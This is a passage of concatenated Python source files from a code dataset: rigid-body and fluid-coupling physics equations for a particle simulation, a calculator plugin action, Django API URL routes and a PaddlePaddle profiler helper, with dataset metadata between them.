print("c_m x f = ", d.cross(F))
wx, wy, wz = S.symbols('wx, wy, wz')
rx, ry, rz = S.symbols('rx, ry, rz')
w = S.Matrix([wx, wy, wz])
r = S.Matrix([rx, ry, rz])
print("w x r = %s" % w.cross(r))
def declare(*args): pass
class RigidBodyMoments(Equation):
def reduce(self, dst, t, dt):
nbody = declare('int')
i = declare('int')
base_mi = declare('int')
base = declare('int')
nbody = dst.num_body[0]
if dst.gpu:
dst.gpu.pull('omega', 'x', 'y', 'z', 'fx', 'fy', 'fz')
d_mi = declare('object')
m = declare('object')
x = declare('object')
y = declare('object')
z = declare('object')
fx = declare('object')
fy = declare('object')
fz = declare('object')
d_mi = dst.mi
cond = declare('object')
for i in range(nbody):
cond = dst.body_id == i
base = i*16
m = dst.m[cond]
x = dst.x[cond]
y = dst.y[cond]
z = dst.z[cond]
d_mi[base + 0] = numpy.sum(m)
d_mi[base + 1] = numpy.sum(m*x)
d_mi[base + 2] = numpy.sum(m*y)
d_mi[base + 3] = numpy.sum(m*z)
d_mi[base + 4] = numpy.sum(m*(y*y + z*z))
d_mi[base + 5] = numpy.sum(m*(x*x + z*z))
d_mi[base + 6] = numpy.sum(m*(x*x + y*y))
d_mi[base + 7] = -numpy.sum(m*x*y)
d_mi[base + 8] = -numpy.sum(m*x*z)
d_mi[base + 9] = -numpy.sum(m*y*z)
fx = dst.fx[cond]
fy = dst.fy[cond]
fz = dst.fz[cond]
d_mi[base + 10] = numpy.sum(fx)
d_mi[base + 11] = numpy.sum(fy)
d_mi[base + 12] = numpy.sum(fz)
d_mi[base + 13] = numpy.sum(y*fz - z*fy)
d_mi[base + 14] = numpy.sum(z*fx - x*fz)
d_mi[base + 15] = numpy.sum(x*fy - y*fx)
d_mi[:] = parallel_reduce_array(dst.mi)
for i in range(nbody):
base_mi = i*16
base = i*3
m = d_mi[base_mi + 0]
dst.total_mass[i] = m
cx = d_mi[base_mi + 1]/m
cy = d_mi[base_mi + 2]/m
cz = d_mi[base_mi + 3]/m
dst.cm[base + 0] = cx
dst.cm[base + 1] = cy
dst.cm[base + 2] = cz
ixx = d_mi[base_mi + 4] - (cy*cy + cz*cz)*m
iyy = d_mi[base_mi + 5] - (cx*cx + cz*cz)*m
izz = d_mi[base_mi + 6] - (cx*cx + cy*cy)*m
ixy = d_mi[base_mi + 7] + cx*cy*m
ixz = d_mi[base_mi + 8] + cx*cz*m
iyz = d_mi[base_mi + 9] + cy*cz*m
d_mi[base_mi + 0] = ixx
d_mi[base_mi + 1] = ixy
d_mi[base_mi + 2] = ixz
d_mi[base_mi + 3] = ixy
d_mi[base_mi + 4] = iyy
d_mi[base_mi + 5] = iyz
d_mi[base_mi + 6] = ixz
d_mi[base_mi + 7] = iyz
d_mi[base_mi + 8] = izz
fx = d_mi[base_mi + 10]
fy = d_mi[base_mi + 11]
fz = d_mi[base_mi + 12]
dst.force[base + 0] = fx
dst.force[base + 1] = fy
dst.force[base + 2] = fz
dst.ac[base + 0] = fx/m
dst.ac[base + 1] = fy/m
dst.ac[base + 2] = fz/m
tx = d_mi[base_mi + 13]
ty = d_mi[base_mi + 14]
tz = d_mi[base_mi + 15]
tx -= cy*fz - cz*fy
ty -= -cx*fz + cz*fx
tz -= cx*fy - cy*fx
dst.torque[base + 0] = tx
dst.torque[base + 1] = ty
dst.torque[base + 2] = tz
wx = dst.omega[base + 0]
wy = dst.omega[base + 1]
wz = dst.omega[base + 2]
tmp0 = iyz**2
tmp1 = ixy**2
tmp2 = ixz**2
tmp3 = ixx*iyy
tmp4 = ixy*ixz
tmp5 = 1./(ixx*tmp0 + iyy*tmp2 - 2*iyz*tmp4 + izz*tmp1 - izz*tmp3)
tmp6 = ixy*izz - ixz*iyz
tmp7 = ixz*wx + iyz*wy + izz*wz
tmp8 = ixx*wx + ixy*wy + ixz*wz
tmp9 = tmp7*wx - tmp8*wz + ty
tmp10 = ixy*iyz - ixz*iyy
tmp11 = ixy*wx + iyy*wy + iyz*wz
tmp12 = -tmp11*wx + tmp8*wy + tz
tmp13 = tmp11*wz - tmp7*wy + tx
tmp14 = ixx*iyz - tmp4
dst.omega_dot[base + 0] = tmp5*(-tmp10*tmp12 -
tmp13*(iyy*izz - tmp0) + tmp6*tmp9)
dst.omega_dot[base + 1] = tmp5*(tmp12*tmp14 +
tmp13*tmp6 - tmp9*(ixx*izz - tmp2))
dst.omega_dot[base + 2] = tmp5*(-tmp10*tmp13 -
tmp12*(-tmp1 + tmp3) + tmp14*tmp9)
if dst.gpu:
dst.gpu.push(
'total_mass', 'mi', 'cm', 'force', 'ac', 'torque',
'omega_dot'
)
class RigidBodyMotion(Equation):
def initialize(self, d_idx, d_x, d_y, d_z, d_u, d_v, d_w,
d_cm, d_vc, d_ac, d_omega, d_body_id):
base = declare('int')
base = d_body_id[d_idx]*3
wx = d_omega[base + 0]
wy = d_omega[base + 1]
wz = d_omega[base + 2]
rx = d_x[d_idx] - d_cm[base + 0]
ry = d_y[d_idx] - d_cm[base + 1]
rz = d_z[d_idx] - d_cm[base + 2]
d_u[d_idx] = d_vc[base + 0] + wy*rz - wz*ry
d_v[d_idx] = d_vc[base + 1] + wz*rx - wx*rz
d_w[d_idx] = d_vc[base + 2] + wx*ry - wy*rx
class BodyForce(Equation):
def __init__(self, dest, sources, gx=0.0, gy=0.0, gz=0.0):
self.gx = gx
self.gy = gy
self.gz = gz
super(BodyForce, self).__init__(dest, sources)
def initialize(self, d_idx, d_m, d_fx, d_fy, d_fz, d_num_body, d_mi):
d_fx[d_idx] = d_m[d_idx]*self.gx
d_fy[d_idx] = d_m[d_idx]*self.gy
d_fz[d_idx] = d_m[d_idx]*self.gz
class SummationDensityBoundary(Equation):
def __init__(self, dest, sources, fluid_rho=1000.0):
self.fluid_rho = fluid_rho
super(SummationDensityBoundary, self).__init__(dest, sources)
def loop(self, d_idx, d_rho, s_idx, s_m, s_V, WIJ):
d_rho[d_idx] += self.fluid_rho * s_V[s_idx] * WIJ
class NumberDensity(Equation):
def initialize(self, d_idx, d_V):
d_V[d_idx] = 0.0
def loop(self, d_idx, d_V, WIJ):
d_V[d_idx] += WIJ
class SummationDensityRigidBody(Equation):
def __init__(self, dest, sources, rho0):
self.rho0 = rho0
super(SummationDensityRigidBody, self).__init__(dest, sources)
def initialize(self, d_idx, d_rho):
d_rho[d_idx] = 0.0
def loop(self, d_idx, d_rho, s_idx, s_V, WIJ):
d_rho[d_idx] += self.rho0/s_V[s_idx]*WIJ
class ViscosityRigidBody(Equation):
def __init__(self, dest, sources, rho0, nu):
self.nu = nu
self.rho0 = rho0
super(ViscosityRigidBody, self).__init__(dest, sources)
def loop(self, d_idx, d_m, d_au, d_av, d_aw, d_rho,
s_idx, s_V, s_fx, s_fy, s_fz,
EPS, VIJ, XIJ, R2IJ, DWIJ):
phi_b = self.rho0/(s_V[s_idx]*d_rho[d_idx])
vijdotxij = min(VIJ[0]*XIJ[0] + VIJ[1]*XIJ[1] + VIJ[2]*XIJ[2], 0.0)
fac = self.nu*phi_b*vijdotxij/(R2IJ + EPS)
ax = fac*DWIJ[0]
ay = fac*DWIJ[1]
az = fac*DWIJ[2]
d_au[d_idx] += ax
d_av[d_idx] += ay
d_aw[d_idx] += az
s_fx[s_idx] += -d_m[d_idx]*ax
s_fy[s_idx] += -d_m[d_idx]*ay
s_fz[s_idx] += -d_m[d_idx]*az
class PressureRigidBody(Equation):
def __init__(self, dest, sources, rho0):
self.rho0 = rho0
super(PressureRigidBody, self).__init__(dest, sources)
def loop(self, d_idx, d_m, d_rho, d_au, d_av, d_aw, d_p,
s_idx, s_V, s_fx, s_fy, s_fz, DWIJ):
rho1 = 1.0/d_rho[d_idx]
fac = -d_p[d_idx]*rho1*rho1*self.rho0/s_V[s_idx]
ax = fac*DWIJ[0]
ay = fac*DWIJ[1]
az = fac*DWIJ[2]
d_au[d_idx] += ax
d_av[d_idx] += ay
d_aw[d_idx] += az
s_fx[s_idx] += -d_m[d_idx]*ax
s_fy[s_idx] += -d_m[d_idx]*ay
s_fz[s_idx] += -d_m[d_idx]*az
class AkinciRigidFluidCoupling(Equation):
def __init__(self, dest, sources, fluid_rho=1000):
super(AkinciRigidFluidCoupling, self).__init__(dest, sources)
self.fluid_rho = fluid_rho
def loop(self, d_idx, d_m, d_rho, d_au, d_av, d_aw, d_p,
s_idx, s_V, s_fx, s_fy, s_fz, DWIJ, s_m, s_p, s_rho):
psi = s_V[s_idx] * self.fluid_rho
_t1 = 2 * d_p[d_idx] / (d_rho[d_idx]**2)
d_au[d_idx] += -psi * _t1 * DWIJ[0]
d_av[d_idx] += -psi * _t1 * DWIJ[1]
d_aw[d_idx] += -psi * _t1 * DWIJ[2]
s_fx[s_idx] += d_m[d_idx] * psi * _t1 * DWIJ[0]
s_fy[s_idx] += d_m[d_idx] * psi * _t1 * DWIJ[1]
s_fz[s_idx] += d_m[d_idx] * psi * _t1 * DWIJ[2]
class LiuFluidForce(Equation):
def __init__(self, dest, sources):
super(LiuFluidForce, self).__init__(dest, sources)
def loop(self, d_idx, d_m, d_rho, d_au, d_av, d_aw, d_p,
s_idx, s_V, s_fx, s_fy, s_fz, DWIJ, s_m, s_p, s_rho):
_t1 = s_p[s_idx] / (s_rho[s_idx]**2) + d_p[d_idx] / (d_rho[d_idx]**2)
d_au[d_idx] += -s_m[s_idx] * _t1 * DWIJ[0]
d_av[d_idx] += -s_m[s_idx] * _t1 * DWIJ[1]
d_aw[d_idx] += -s_m[s_idx] * _t1 * DWIJ[2]
s_fx[s_idx] += d_m[d_idx] * s_m[s_idx] * _t1 * DWIJ[0]
s_fy[s_idx] += d_m[d_idx] * s_m[s_idx] * _t1 * DWIJ[1]
s_fz[s_idx] += d_m[d_idx] * s_m[s_idx] * _t1 * DWIJ[2]
class RigidBodyForceGPUGems(Equation):
def __init__(self, dest, sources, k=1.0, d=1.0, eta=1.0, kt=1.0):
self.k = k
self.d = d
self.eta = eta
self.kt = kt
super(RigidBodyForceGPUGems, self).__init__(dest, sources)
def loop(self, d_idx, d_fx, d_fy, d_fz, d_h, d_total_mass, XIJ,
RIJ, R2IJ, VIJ):
vijdotrij = VIJ[0]*XIJ[0] + VIJ[1]*XIJ[1] + VIJ[2]*XIJ[2]
if RIJ > 1e-9:
vijdotrij_r2ij = vijdotrij/R2IJ
nij_x = XIJ[0]/RIJ
nij_y = XIJ[1]/RIJ
nij_z = XIJ[2]/RIJ
else:
vijdotrij_r2ij = 0.0
nij_x = 0.0
nij_y = 0.0
nij_z = 0.0
vijt_x = VIJ[0] - vijdotrij_r2ij*XIJ[0]
vijt_y = VIJ[1] - vijdotrij_r2ij*XIJ[1]
vijt_z = VIJ[2] - vijdotrij_r2ij*XIJ[2]
d = self.d*d_h[d_idx]
fac = self.k*d_total_mass[0]/d*max(d - RIJ, 0.0)
d_fx[d_idx] += fac*nij_x - self.eta*VIJ[0] - self.kt*vijt_x
d_fy[d_idx] += fac*nij_y - self.eta*VIJ[1] - self.kt*vijt_y
d_fz[d_idx] += fac*nij_z - self.eta*VIJ[2] - self.kt*vijt_z
class RigidBodyCollision(Equation):
def __init__(self, dest, sources, kn=1e3, mu=0.5, en=0.8):
self.kn = kn
self.kt = 2. / 7. * kn
m_eff = np.pi * 0.5**2 * 1e-6 * 2120
self.gamma_n = -(2 * np.sqrt(kn * m_eff) * np.log(en)) / (
np.sqrt(np.pi**2 + np.log(en)**2))
self.gamma_t = 0.5 * self.gamma_n
self.mu = mu
super(RigidBodyCollision, self).__init__(dest, sources)
def loop(self, d_idx, d_fx, d_fy, d_fz, d_h, d_total_mass, d_rad_s,
d_tang_disp_x, d_tang_disp_y, d_tang_disp_z, d_tang_velocity_x,
d_tang_velocity_y, d_tang_velocity_z, s_idx, s_rad_s, XIJ, RIJ,
R2IJ, VIJ):
overlap = 0
if RIJ > 1e-9:
overlap = d_rad_s[d_idx] + s_rad_s[s_idx] - RIJ
if overlap > 0:
nij_x = -XIJ[0] / RIJ
nij_y = -XIJ[1] / RIJ
nij_z = -XIJ[2] / RIJ
vijdotnij = VIJ[0] * nij_x + VIJ[1] * nij_y + VIJ[2] * nij_z
vijn_x = vijdotnij * nij_x
vijn_y = vijdotnij * nij_y
vijn_z = vijdotnij * nij_z
fn_x = -self.kn * overlap * nij_x - self.gamma_n * vijn_x
fn_y = -self.kn * overlap * nij_y - self.gamma_n * vijn_y
fn_z = -self.kn * overlap * nij_z - self.gamma_n * vijn_z
d_tang_velocity_x[d_idx] = VIJ[0] - vijn_x
d_tang_velocity_y[d_idx] = VIJ[1] - vijn_y
d_tang_velocity_z[d_idx] = VIJ[2] - vijn_z
dtvx = d_tang_velocity_x[d_idx]
dtvy = d_tang_velocity_y[d_idx]
dtvz = d_tang_velocity_z[d_idx]
_tang = sqrt(dtvx*dtvx + dtvy*dtvy + dtvz*dtvz)
tij_x = 0
tij_y = 0
tij_z = 0
if _tang > 0:
tij_x = d_tang_velocity_x[d_idx] / _tang
tij_y = d_tang_velocity_y[d_idx] / _tang
tij_z = d_tang_velocity_z[d_idx] / _tang
ft_x_d = -self.gamma_t * d_tang_velocity_x[d_idx]
ft_y_d = -self.gamma_t * d_tang_velocity_y[d_idx]
ft_z_d = -self.gamma_t * d_tang_velocity_z[d_idx]
ft_x_s = -self.kt * d_tang_disp_x[d_idx]
ft_y_s = -self.kt * d_tang_disp_y[d_idx]
ft_z_s = -self.kt * d_tang_disp_z[d_idx]
ft_x = ft_x_d + ft_x_s
ft_y = ft_y_d + ft_y_s
ft_z = ft_z_d + ft_z_s
ftij = sqrt((ft_x**2) + (ft_y**2) + (ft_z**2))
fnij = sqrt((fn_x**2) + (fn_y**2) + (fn_z**2))
_fnij = self.mu * fnij
if _fnij < ftij:
ft_x = -_fnij * tij_x
ft_y = -_fnij * tij_y
ft_z = -_fnij * tij_z
d_fx[d_idx] += fn_x + ft_x
d_fy[d_idx] += fn_y + ft_y
d_fz[d_idx] += fn_z + ft_z
else:
d_tang_velocity_x[d_idx] = 0
d_tang_velocity_y[d_idx] = 0
d_tang_velocity_z[d_idx] = 0
d_tang_disp_x[d_idx] = 0
d_tang_disp_y[d_idx] = 0
d_tang_disp_z[d_idx] = 0
class RigidBodyWallCollision(Equation):
def __init__(self, dest, sources, kn=1e3, mu=0.5, en=0.8):
self.kn = kn
self.kt = 2. / 7. * kn
m_eff = np.pi * 0.5**2 * 1e-6 * 2120
self.gamma_n = -(2 * np.sqrt(kn * m_eff) * np.log(en)) / (
np.sqrt(np.pi**2 + np.log(en)**2))
print(self.gamma_n)
self.gamma_t = 0.5 * self.gamma_n
self.mu = mu
super(RigidBodyWallCollision, self).__init__(dest, sources)
def loop(self, d_idx, d_fx, d_fy, d_fz, d_h, d_total_mass, d_rad_s,
d_tang_disp_x, d_tang_disp_y, d_tang_disp_z, d_tang_velocity_x,
d_tang_velocity_y, d_tang_velocity_z, s_idx, XIJ, RIJ,
R2IJ, VIJ, s_nx, s_ny, s_nz):
overlap = d_rad_s[d_idx] - (XIJ[0] * s_nx[s_idx] + XIJ[1] *
s_ny[s_idx] + XIJ[2] * s_nz[s_idx])
if overlap > 0:
nij_x = -s_nx[s_idx]
nij_y = -s_ny[s_idx]
nij_z = -s_nz[s_idx]
vijdotnij = VIJ[0] * nij_x + VIJ[1] * nij_y + VIJ[2] * nij_z
vijn_x = vijdotnij * nij_x
vijn_y = vijdotnij * nij_y
vijn_z = vijdotnij * nij_z
fn_x = -self.kn * overlap * nij_x - self.gamma_n * vijn_x
fn_y = -self.kn * overlap * nij_y - self.gamma_n * vijn_y
fn_z = -self.kn * overlap * nij_z - self.gamma_n * vijn_z
d_tang_velocity_x[d_idx] = VIJ[0] - vijn_x
d_tang_velocity_y[d_idx] = VIJ[1] - vijn_y
d_tang_velocity_z[d_idx] = VIJ[2] - vijn_z
_tang = (
(d_tang_velocity_x[d_idx]**2) + (d_tang_velocity_y[d_idx]**2) +
(d_tang_velocity_z[d_idx]**2))**(1. / 2.)
tij_x = 0
tij_y = 0
tij_z = 0
if _tang > 0:
tij_x = d_tang_velocity_x[d_idx] / _tang
tij_y = d_tang_velocity_y[d_idx] / _tang
tij_z = d_tang_velocity_z[d_idx] / _tang
ft_x_d = -self.gamma_t * d_tang_velocity_x[d_idx]
ft_y_d = -self.gamma_t * d_tang_velocity_y[d_idx]
ft_z_d = -self.gamma_t * d_tang_velocity_z[d_idx]
ft_x_s = -self.kt * d_tang_disp_x[d_idx]
ft_y_s = -self.kt * d_tang_disp_y[d_idx]
ft_z_s = -self.kt * d_tang_disp_z[d_idx]
ft_x = ft_x_d + ft_x_s
ft_y = ft_y_d + ft_y_s
ft_z = ft_z_d + ft_z_s
ftij = ((ft_x**2) + (ft_y**2) + (ft_z**2))**(1. / 2.)
fnij = ((fn_x**2) + (fn_y**2) + (fn_z**2))**(1. / 2.)
_fnij = self.mu * fnij
if _fnij < ftij:
ft_x = -_fnij * tij_x
ft_y = -_fnij * tij_y
ft_z = -_fnij * tij_z
d_fx[d_idx] += fn_x + ft_x
d_fy[d_idx] += fn_y + ft_y
d_fz[d_idx] += fn_z + ft_z
else:
d_tang_velocity_x[d_idx] = 0
d_tang_velocity_y[d_idx] = 0
d_tang_velocity_z[d_idx] = 0
d_tang_disp_x[d_idx] = 0
d_tang_disp_y[d_idx] = 0
d_tang_disp_z[d_idx] = 0
class EulerStepRigidBody(IntegratorStep):
def initialize(self):
pass
def stage1(self, d_idx, d_u, d_v, d_w, d_x, d_y, d_z,
d_omega, d_omega_dot, d_vc, d_ac, d_num_body,
dt=0.0):
_i = declare('int')
_j = declare('int')
base = declare('int')
if d_idx == 0:
for _i in range(d_num_body[0]):
base = 3*_i
for _j in range(3):
d_vc[base + _j] += d_ac[base + _j]*dt
d_omega[base + _j] += d_omega_dot[base + _j]*dt
d_x[d_idx] += dt*d_u[d_idx]
d_y[d_idx] += dt*d_v[d_idx]
d_z[d_idx] += dt*d_w[d_idx]
class RK2StepRigidBody(IntegratorStep):
def initialize(self, d_idx, d_x, d_y, d_z, d_x0, d_y0, d_z0,
d_omega, d_omega0, d_vc, d_vc0, d_num_body):
_i = declare('int')
_j = declare('int')
base = declare('int')
if d_idx == 0:
for _i in range(d_num_body[0]):
base = 3*_i
for _j in range(3):
d_vc0[base + _j] = d_vc[base + _j]
d_omega0[base + _j] = d_omega[base + _j]
d_x0[d_idx] = d_x[d_idx]
d_y0[d_idx] = d_y[d_idx]
d_z0[d_idx] = d_z[d_idx]
def stage1(self, d_idx, d_u, d_v, d_w, d_x, d_y, d_z, d_x0, d_y0, d_z0,
d_omega, d_omega_dot, d_vc, d_ac, d_omega0, d_vc0, d_num_body,
dt=0.0):
dtb2 = 0.5*dt
_i = declare('int')
j = declare('int')
base = declare('int')
if d_idx == 0:
for _i in range(d_num_body[0]):
base = 3*_i
for j in range(3):
d_vc[base + j] = d_vc0[base + j] + d_ac[base + j]*dtb2
d_omega[base + j] = (d_omega0[base + j] +
d_omega_dot[base + j]*dtb2)
d_x[d_idx] = d_x0[d_idx] + dtb2*d_u[d_idx]
d_y[d_idx] = d_y0[d_idx] + dtb2*d_v[d_idx]
d_z[d_idx] = d_z0[d_idx] + dtb2*d_w[d_idx]
def stage2(self, d_idx, d_u, d_v, d_w, d_x, d_y, d_z, d_x0, d_y0, d_z0,
d_omega, d_omega_dot, d_vc, d_ac, d_omega0, d_vc0, d_num_body,
dt=0.0):
_i = declare('int')
j = declare('int')
base = declare('int')
if d_idx == 0:
for _i in range(d_num_body[0]):
base = 3*_i
for j in range(3):
d_vc[base + j] = d_vc0[base + j] + d_ac[base + j]*dt
d_omega[base + j] = (d_omega0[base + j] +
d_omega_dot[base + j]*dt)
d_x[d_idx] = d_x0[d_idx] + dt*d_u[d_idx]
d_y[d_idx] = d_y0[d_idx] + dt*d_v[d_idx]
d_z[d_idx] = d_z0[d_idx] + dt*d_w[d_idx]
| true | true |
f72ee556b494b4e5facd04b0cd2dbe2c186e4740 | 1,156 | py | Python | plugins/math/komand_math/actions/calculate/action.py | lukaszlaszuk/insightconnect-plugins | 8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892 | [
"MIT"
] | 46 | 2019-06-05T20:47:58.000Z | 2022-03-29T10:18:01.000Z | plugins/math/komand_math/actions/calculate/action.py | lukaszlaszuk/insightconnect-plugins | 8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892 | [
"MIT"
] | 386 | 2019-06-07T20:20:39.000Z | 2022-03-30T17:35:01.000Z | plugins/math/komand_math/actions/calculate/action.py | lukaszlaszuk/insightconnect-plugins | 8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892 | [
"MIT"
] | 43 | 2019-07-09T14:13:58.000Z | 2022-03-28T12:04:46.000Z | import insightconnect_plugin_runtime
from .schema import CalculateInput, CalculateOutput, Input, Output, Component
from insightconnect_plugin_runtime.exceptions import PluginException
from simpleeval import simple_eval
class Calculate(insightconnect_plugin_runtime.Action):
_result = None
def __init__(self):
super(self.__class__, self).__init__(
name="calculate",
description=Component.DESCRIPTION,
input=CalculateInput(),
output=CalculateOutput(),
)
def run(self, params={}):
equation = params.get(Input.EQUATION)
result = Calculate.execute_equation(equation)
if result is None:
raise PluginException(
cause="Calculation error",
assistance="Error occurred while calculating the equation. Check to make sure it is valid and try "
"again. ",
)
return {Output.RESULT: result}
@staticmethod
def execute_equation(eq):
eq = str().join([c for c in eq if (c.isdecimal() or c in ["+", "-", "*", "/", "**", "%", "(", ")", "."])])
return simple_eval(eq)
| 33.028571 | 115 | 0.622837 | import insightconnect_plugin_runtime
from .schema import CalculateInput, CalculateOutput, Input, Output, Component
from insightconnect_plugin_runtime.exceptions import PluginException
from simpleeval import simple_eval
class Calculate(insightconnect_plugin_runtime.Action):
_result = None
def __init__(self):
super(self.__class__, self).__init__(
name="calculate",
description=Component.DESCRIPTION,
input=CalculateInput(),
output=CalculateOutput(),
)
def run(self, params={}):
equation = params.get(Input.EQUATION)
result = Calculate.execute_equation(equation)
if result is None:
raise PluginException(
cause="Calculation error",
assistance="Error occurred while calculating the equation. Check to make sure it is valid and try "
"again. ",
)
return {Output.RESULT: result}
@staticmethod
def execute_equation(eq):
eq = str().join([c for c in eq if (c.isdecimal() or c in ["+", "-", "*", "/", "**", "%", "(", ")", "."])])
return simple_eval(eq)
| true | true |
f72ee7470b394ffe1d61f50214d906f893d3278c | 937 | py | Python | server/api/urls.py | di-unipi-socc/MicroAnalyserServer | aa066df5cf329328e82c1d72cf09ddc249887a64 | [
"MIT"
] | 13 | 2019-10-01T20:23:38.000Z | 2021-11-24T09:14:04.000Z | server/api/urls.py | di-unipi-socc/microFreshener | aa066df5cf329328e82c1d72cf09ddc249887a64 | [
"MIT"
] | 21 | 2019-11-04T15:29:23.000Z | 2022-02-26T10:41:20.000Z | server/api/urls.py | di-unipi-socc/MicroAnalyserServer | aa066df5cf329328e82c1d72cf09ddc249887a64 | [
"MIT"
] | 2 | 2021-10-11T07:48:36.000Z | 2021-12-14T21:02:03.000Z | # api/urls.py
from django.contrib import admin
from django.urls import include, path
from rest_framework.urlpatterns import format_suffix_patterns
from api import view
urlpatterns = [
path('model', view.graph),
path('analyse', view.graph_analysis),
path('export', view.graph_export),
path('import', view.graph_import),
path('refine/istio', view.graph_refine_istio),
path('refine', view.graph_refine),
path('example', view.graph_examples),
# team api
# path('team/', view.team, name='microtosca-team'),
path('team/<str:team_name>', view.team_detail, name='microtosca-team-get'),
]
urlpatterns = format_suffix_patterns(urlpatterns)
# We don't necessarily need to add these extra url patterns in,
# but it gives us a simple, clean way of referring to a specific format.
# http http://127.0.0.1:8000/snippets.json # JSON suffix
# http http://127.0.0.1:8000/snippets.api # Browsable API suffix
| 34.703704 | 79 | 0.721451 |
from django.contrib import admin
from django.urls import include, path
from rest_framework.urlpatterns import format_suffix_patterns
from api import view
urlpatterns = [
path('model', view.graph),
path('analyse', view.graph_analysis),
path('export', view.graph_export),
path('import', view.graph_import),
path('refine/istio', view.graph_refine_istio),
path('refine', view.graph_refine),
path('example', view.graph_examples),
path('team/<str:team_name>', view.team_detail, name='microtosca-team-get'),
]
urlpatterns = format_suffix_patterns(urlpatterns)
# but it gives us a simple, clean way of referring to a specific format.
# http http://127.0.0.1:8000/snippets.json # JSON suffix
# http http://127.0.0.1:8000/snippets.api # Browsable API suffix
| true | true |
f72ee8622daf69c1cb94611e88480ed29b8c08ab | 4,390 | py | Python | paddlers/models/ppdet/utils/profiler.py | Xiaracto/PaddleRS | 6e9b99a79fe740775daff310bd1ca3e6fbc86f80 | [
"Apache-2.0"
] | 1 | 2022-03-30T10:59:58.000Z | 2022-03-30T10:59:58.000Z | paddlers/models/ppdet/utils/profiler.py | wondering516/PaddleRS | b6f7033f3c0ca7bc6952456c0a0f53eef6c1c07f | [
"Apache-2.0"
] | null | null | null | paddlers/models/ppdet/utils/profiler.py | wondering516/PaddleRS | b6f7033f3c0ca7bc6952456c0a0f53eef6c1c07f | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import paddle
# A global variable to record the number of calling times for profiler
# functions. It is used to specify the tracing range of training steps.
_profiler_step_id = 0
# A global variable to avoid parsing from string every time.
_profiler_options = None
class ProfilerOptions(object):
'''
Use a string to initialize a ProfilerOptions.
The string should be in the format: "key1=value1;key2=value;key3=value3".
For example:
"profile_path=model.profile"
"batch_range=[50, 60]; profile_path=model.profile"
"batch_range=[50, 60]; tracer_option=OpDetail; profile_path=model.profile"
ProfilerOptions supports following key-value pair:
batch_range - a integer list, e.g. [100, 110].
state - a string, the optional values are 'CPU', 'GPU' or 'All'.
sorted_key - a string, the optional values are 'calls', 'total',
'max', 'min' or 'ave.
tracer_option - a string, the optional values are 'Default', 'OpDetail',
'AllOpDetail'.
profile_path - a string, the path to save the serialized profile data,
which can be used to generate a timeline.
exit_on_finished - a boolean.
'''
def __init__(self, options_str):
assert isinstance(options_str, str)
self._options = {
'batch_range': [10, 20],
'state': 'All',
'sorted_key': 'total',
'tracer_option': 'Default',
'profile_path': '/tmp/profile',
'exit_on_finished': True
}
self._parse_from_string(options_str)
def _parse_from_string(self, options_str):
for kv in options_str.replace(' ', '').split(';'):
key, value = kv.split('=')
if key == 'batch_range':
value_list = value.replace('[', '').replace(']', '').split(',')
value_list = list(map(int, value_list))
if len(value_list) >= 2 and value_list[0] >= 0 and value_list[
1] > value_list[0]:
self._options[key] = value_list
elif key == 'exit_on_finished':
self._options[key] = value.lower() in ("yes", "true", "t", "1")
elif key in [
'state', 'sorted_key', 'tracer_option', 'profile_path'
]:
self._options[key] = value
def __getitem__(self, name):
if self._options.get(name, None) is None:
raise ValueError(
"ProfilerOptions does not have an option named %s." % name)
return self._options[name]
def add_profiler_step(options_str=None):
'''
Enable the operator-level timing using PaddlePaddle's profiler.
The profiler uses a independent variable to count the profiler steps.
One call of this function is treated as a profiler step.
Args:
profiler_options - a string to initialize the ProfilerOptions.
Default is None, and the profiler is disabled.
'''
if options_str is None:
return
global _profiler_step_id
global _profiler_options
if _profiler_options is None:
_profiler_options = ProfilerOptions(options_str)
if _profiler_step_id == _profiler_options['batch_range'][0]:
paddle.utils.profiler.start_profiler(
_profiler_options['state'], _profiler_options['tracer_option'])
elif _profiler_step_id == _profiler_options['batch_range'][1]:
paddle.utils.profiler.stop_profiler(_profiler_options['sorted_key'],
_profiler_options['profile_path'])
if _profiler_options['exit_on_finished']:
sys.exit(0)
_profiler_step_id += 1
| 39.196429 | 81 | 0.628246 |
import sys
import paddle
_profiler_step_id = 0
_profiler_options = None
class ProfilerOptions(object):
def __init__(self, options_str):
assert isinstance(options_str, str)
self._options = {
'batch_range': [10, 20],
'state': 'All',
'sorted_key': 'total',
'tracer_option': 'Default',
'profile_path': '/tmp/profile',
'exit_on_finished': True
}
self._parse_from_string(options_str)
def _parse_from_string(self, options_str):
for kv in options_str.replace(' ', '').split(';'):
key, value = kv.split('=')
if key == 'batch_range':
value_list = value.replace('[', '').replace(']', '').split(',')
value_list = list(map(int, value_list))
if len(value_list) >= 2 and value_list[0] >= 0 and value_list[
1] > value_list[0]:
self._options[key] = value_list
elif key == 'exit_on_finished':
self._options[key] = value.lower() in ("yes", "true", "t", "1")
elif key in [
'state', 'sorted_key', 'tracer_option', 'profile_path'
]:
self._options[key] = value
def __getitem__(self, name):
if self._options.get(name, None) is None:
raise ValueError(
"ProfilerOptions does not have an option named %s." % name)
return self._options[name]
def add_profiler_step(options_str=None):
if options_str is None:
return
global _profiler_step_id
global _profiler_options
if _profiler_options is None:
_profiler_options = ProfilerOptions(options_str)
if _profiler_step_id == _profiler_options['batch_range'][0]:
paddle.utils.profiler.start_profiler(
_profiler_options['state'], _profiler_options['tracer_option'])
elif _profiler_step_id == _profiler_options['batch_range'][1]:
paddle.utils.profiler.stop_profiler(_profiler_options['sorted_key'],
_profiler_options['profile_path'])
if _profiler_options['exit_on_finished']:
sys.exit(0)
_profiler_step_id += 1
| true | true |
f72ee96b3252f32009b52b97e42cb9a9308172b4 | 2,405 | py | Python | tools/train.py | yoxu515/aot-benchmark | 5a7665fc8e0f0e64bc8ba6028b15d9ab32f4c56a | [
"BSD-3-Clause"
] | 105 | 2021-11-16T12:43:59.000Z | 2022-03-31T08:05:11.000Z | tools/train.py | lingyunwu14/aot-benchmark | 99f74f051c91ac221e44f3edab3534ae4dd233f7 | [
